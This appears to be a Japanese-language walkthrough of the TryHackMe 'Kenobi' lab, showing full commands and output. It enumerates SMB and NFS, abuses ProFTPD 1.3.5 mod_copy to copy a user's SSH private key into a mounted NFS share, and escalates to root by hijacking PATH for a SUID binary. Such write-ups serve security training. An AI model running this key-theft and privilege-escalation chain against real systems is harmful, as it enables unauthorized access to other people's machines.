Open7
[Try Hack Me]Kenobi
kenryonmap
┌──(kali㉿kali)-[~]
└─$ nmap -A -p- --min-rate 5000 $IP
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-27 20:45 JST
Warning: 10.10.141.231 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.141.231
Host is up (0.27s latency).
Not shown: 61337 closed tcp ports (conn-refused), 4187 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b3:ad:83:41:49:e9:5d:16:8d:3b:0f:05:7b:e2:c0:ae (RSA)
| 256 f8:27:7d:64:29:97:e6:f8:65:54:65:22:f7:c8:1d:8a (ECDSA)
|_ 256 5a:06:ed:eb:b6:56:7e:4c:01:dd:ea:bc:ba:fa:33:79 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/admin.html
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100003 2,3,4 2049/udp nfs
| 100003 2,3,4 2049/udp6 nfs
| 100005 1,2,3 32949/tcp6 mountd
| 100005 1,2,3 40406/udp mountd
| 100005 1,2,3 47898/udp6 mountd
| 100005 1,2,3 60663/tcp mountd
| 100021 1,3,4 35137/tcp nlockmgr
| 100021 1,3,4 36397/tcp6 nlockmgr
| 100021 1,3,4 44579/udp nlockmgr
| 100021 1,3,4 47545/udp6 nlockmgr
| 100227 2,3 2049/tcp nfs_acl
| 100227 2,3 2049/tcp6 nfs_acl
| 100227 2,3 2049/udp nfs_acl
|_ 100227 2,3 2049/udp6 nfs_acl
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open Eetbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2049/tcp open nfs 2-4 (RPC #100003)
35137/tcp open nlockmgr 1-4 (RPC #100021)
46547/tcp open mountd 1-3 (RPC #100005)
52885/tcp open mountd 1-3 (RPC #100005)
60663/tcp open mountd 1-3 (RPC #100005)
Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_nbstat: NetBIOS name: KENOBI, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time:
| date: 2024-01-27T11:46:19
|_ start_date: N/A
|_clock-skew: mean: 2h00m02s, deviation: 3h27m51s, median: 2s
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: kenobi
| NetBIOS computer name: KENOBI\x00
| Domain name: \x00
| FQDN: kenobi
|_ System time: 2024-01-27T05:46:19-06:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 68.44 seconds
Scan the machine with nmap, how many ports are open?
7つ
kenryoUsing the nmap command above, how many shares have been found?
enum4linux
┌──(kali㉿kali)-[~]
└─$ enum4linux -S $IP
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Jan 27 20:54:15 2024
=========================================( Target Information )=========================================
Target ........... 10.10.141.231
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
===========================( Enumerating Workgroup/Domain on 10.10.141.231 )===========================
[+] Got domain/workgroup name: WORKGROUP
===================================( Session Check on 10.10.141.231 )===================================
[+] Server 10.10.141.231 allows sessions using username '', password ''
================================( Getting domain SID for 10.10.141.231 )================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
=================================( Share Enumeration on 10.10.141.231 )=================================
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
anonymous Disk
IPC$ IPC IPC Service (kenobi server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP KENOBI
[+] Attempting to map shares on 10.10.141.231
//10.10.141.231/print$ Mapping: DENIED Listing: N/A Writing: N/A
//10.10.141.231/anonymous Mapping: OK Listing: OK Writing: N/A
[E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
//10.10.141.231/IPC$ Mapping: N/A Listing: N/A Writing: N/A
enum4linux complete on Sat Jan 27 20:54:36 2024
nmap
匿名アクセスできるかはnmapのほうが分かりやすい。
┌──(kali㉿kali)-[~]
└─$ nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.141.231
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-27 20:50 JST
Nmap scan report for 10.10.141.231
Host is up (0.27s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-enum-shares:
| account_used: guest
| \\10.10.141.231\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (kenobi server (Samba, Ubuntu))
| Users: 1
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.141.231\anonymous:
| Type: STYPE_DISKTREE
| Comment:
| Users: 0
| Max Users: <unlimited>
| Path: C:\home\kenobi\share
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.141.231\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users: <unlimited>
| Path: C:\var\lib\samba\printers
| Anonymous access: <none>
|_ Current user access: <none>
3つ
kenryoOnce you're connected, list the files on the share. What is the file can you see?
┌──(kali㉿kali)-[~]
└─$ smbclient //$IP/anonymous
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Sep 4 19:49:09 2019
.. D 0 Wed Sep 4 19:56:07 2019
log.txt N 12237 Wed Sep 4 19:49:09 2019
9204224 blocks of size 1024. 6877108 blocks available
log.txt
kenryoWhat port is FTP running on?
nmapから21
記載されているコマンドを実行してもダウンロードできなかった。
調査したが原因がわからないため、smbclientでtxtをダウンロードする。
┌──(kali㉿kali)-[~]
└─$ smbget -R smb://$IP/anonymous
handle_name_resolve_order: WARNING: Ignoring invalid list value 'smb://10.10.141.231/anonymous' for parameter 'name resolve order'
Downloaded 0b in 0 seconds
What mount can we see?
nmapで出力した以下はrpcのプログラム番号とポート番号の対応表
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100003 2,3,4 2049/udp nfs
| 100003 2,3,4 2049/udp6 nfs
| 100005 1,2,3 32949/tcp6 mountd
| 100005 1,2,3 40406/udp mountd
| 100005 1,2,3 47898/udp6 mountd
| 100005 1,2,3 60663/tcp mountd
| 100021 1,3,4 35137/tcp nlockmgr
| 100021 1,3,4 36397/tcp6 nlockmgr
| 100021 1,3,4 44579/udp nlockmgr
| 100021 1,3,4 47545/udp6 nlockmgr
| 100227 2,3 2049/tcp nfs_acl
| 100227 2,3 2049/tcp6 nfs_acl
| 100227 2,3 2049/udp nfs_acl
|_ 100227 2,3 2049/udp6 nfs_acl
┌──(kali㉿kali)-[~]
└─$ nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.141.231
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-27 21:32 JST
Nmap scan report for 10.10.141.231
Host is up (0.27s latency).
PORT STATE SERVICE
111/tcp open rpcbind
| nfs-showmount:
|_ /var *
Nmap done: 1 IP address (1 host up) scanned in 4.21 seconds
/var
kenryoWhat is the version?
nmapの結果から1.3.5
How many exploits are there for the ProFTPd running?
┌──(kali㉿kali)-[~]
└─$ searchsploit proftpd -s 1.3.5
--------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------- ---------------------------------
ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit) | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution | linux/remote/36803.py
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2) | linux/remote/49908.py
ProFTPd 1.3.5 - File Copy | linux/remote/36742.txt
--------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
4つ
We're now going to copy Kenobi's private key using SITE CPFR and SITE CPTO commands.
解説とexploit-dbのコードからsite cpfrでコピーしたいファイルを指定し、site cptoでコピー先を指定すればファイル取得できてしまうという脆弱性。
ユーザkenobiの秘密鍵をNFSマウントディレクトリ/var下にコピーする。
┌──(kali㉿kali)-[~]
└─$ nc $IP 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.141.231]
site cpfr /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
site cpto /var/tmp/id_rsa
250 Copy successful
記載されているコマンドを実行。
/varを攻撃サーバにマウントする。
┌──(kali㉿kali)-[~]
└─$ sudo mkdir /mnt/kenobiNFS
[sudo] password for kali:
┌──(kali㉿kali)-[~]
└─$ sudo mount 10.10.141.231:/var /mnt/kenobiNFS
┌──(kali㉿kali)-[~]
└─$ ls -la /mnt/kenobiNFS
total 56
drwxr-xr-x 14 root root 4096 Sep 4 2019 .
drwxr-xr-x 3 root root 4096 Jan 27 22:00 ..
drwxr-xr-x 2 root root 4096 Jan 27 21:25 backups
drwxr-xr-x 9 root root 4096 Sep 4 2019 cache
drwxrwxrwt 2 root root 4096 Sep 4 2019 crash
drwxr-xr-x 40 root root 4096 Sep 4 2019 lib
drwxrwsr-x 2 root staff 4096 Apr 13 2016 local
lrwxrwxrwx 1 root root 9 Sep 4 2019 lock -> /run/lock
drwxrwxr-x 10 root _ssh 4096 Sep 4 2019 log
drwxrwsr-x 2 root mail 4096 Feb 27 2019 mail
drwxr-xr-x 2 root root 4096 Feb 27 2019 opt
lrwxrwxrwx 1 root root 4 Sep 4 2019 run -> /run
drwxr-xr-x 2 root root 4096 Jan 30 2019 snap
drwxr-xr-x 5 root root 4096 Sep 4 2019 spool
drwxrwxrwt 6 root root 4096 Jan 27 21:53 tmp
drwxr-xr-x 3 root root 4096 Sep 4 2019 www
┌──(kali㉿kali)-[~]
└─$ ls -la /mnt/kenobiNFS/tmp
total 28
drwxrwxrwt 6 root root 4096 Jan 27 21:53 .
drwxr-xr-x 14 root root 4096 Sep 4 2019 ..
-rw-r--r-- 1 kali kali 1675 Jan 27 21:53 id_rsa
drwx------ 3 root root 4096 Jan 27 20:41 systemd-private-1021f923dff64384af67fb2b6ec4c533-systemd-timesyncd.service-UMqH9s
drwx------ 3 root root 4096 Sep 4 2019 systemd-private-2408059707bc41329243d2fc9e613f1e-systemd-timesyncd.service-a5PktM
drwx------ 3 root root 4096 Sep 4 2019 systemd-private-6f4acd341c0b40569c92cee906c3edc9-systemd-timesyncd.service-z5o4Aw
drwx------ 3 root root 4096 Sep 4 2019 systemd-private-e69bbb0653ce4ee3bd9ae0d93d2a5806-systemd-timesyncd.service-zObUdn
┌──(kali㉿kali)-[~]
└─$ cp /mnt/kenobiNFS/tmp/id_rsa .
┌──(kali㉿kali)-[~]
└─$ ssh -i id_rsa kenobi@$IP
The authenticity of host '10.10.141.231 (10.10.141.231)' can't be established.
ED25519 key fingerprint is SHA256:GXu1mgqL0Wk2ZHPmEUVIS0hvusx4hk33iTcwNKPktFw.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.141.231' (ED25519) to the list of known hosts.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for 'id_rsa' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "id_rsa": bad permissions
kenobi@10.10.141.231's password:
┌──(kali㉿kali)-[~]
└─$ sudo chmod 600 id_rsa
┌──(kali㉿kali)-[~]
└─$ ssh -i id_rsa kenobi@$IP
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.8.0-58-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
103 packages can be updated.
65 updates are security updates.
Last login: Wed Sep 4 07:10:15 2019 from 192.168.1.147
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
kenobi@kenobi:~$ cat user.txt
What file looks particularly out of the ordinary?
kenobi@kenobi:~$ find / -perm -u=s -type f 2>/dev/null
/sbin/mount.nfs
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/newuidmap
/usr/bin/gpasswd
/usr/bin/menu
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/at
/usr/bin/newgrp
/bin/umount
/bin/fusermount
/bin/mount
/bin/ping
/bin/su
/bin/ping6
文字数から/usr/bin/menu
Run the binary, how many options appear?
kenobi@kenobi:~$ /usr/bin/menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :1
3つ
kenobi@kenobi:~$ strings /usr/bin/menu
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
__isoc99_scanf
puts
__stack_chk_fail
printf
system
__libc_start_main
__gmon_start__
GLIBC_2.7
GLIBC_2.4
GLIBC_2.2.5
UH-`
AWAVA
AUATL
[]A\A]A^A_
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :
curl -I localhost
uname -r
ifconfig
Invalid choice
;*3$"
GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.11) 5.4.0 20160609
crtstuff.c
__JCR_LIST__
deregister_tm_clones
__do_global_dtors_aux
completed.7594
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
menu.c
__FRAME_END__
__JCR_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
puts@@GLIBC_2.2.5
_edata
__stack_chk_fail@@GLIBC_2.4
system@@GLIBC_2.2.5
printf@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
_Jv_RegisterClasses
__isoc99_scanf@@GLIBC_2.7
__TMC_END__
_ITM_registerTMCloneTable
setuid@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.jcr
.dynamic
.got.plt
.data
.bss
.comment
menuはコマンドを絶対パスなしで実行している。
同名の悪意のあるファイルを作成し、PATHを通して実行させる。
kenobi@kenobi:~$ echo /bin/sh > ifconfig
kenobi@kenobi:~$ pwd
/home/kenobi
kenobi@kenobi:~$ chmod 777 ifconfig
kenobi@kenobi:~$ export PATH=/home/kenobi:$PATH
kenobi@kenobi:~$ /usr/bin/menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :3
# id
uid=0(root) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
# ls
ifconfig share user.txt
# pwd
/home/kenobi
# cd /root
# ls
root.txt
# cat root.txt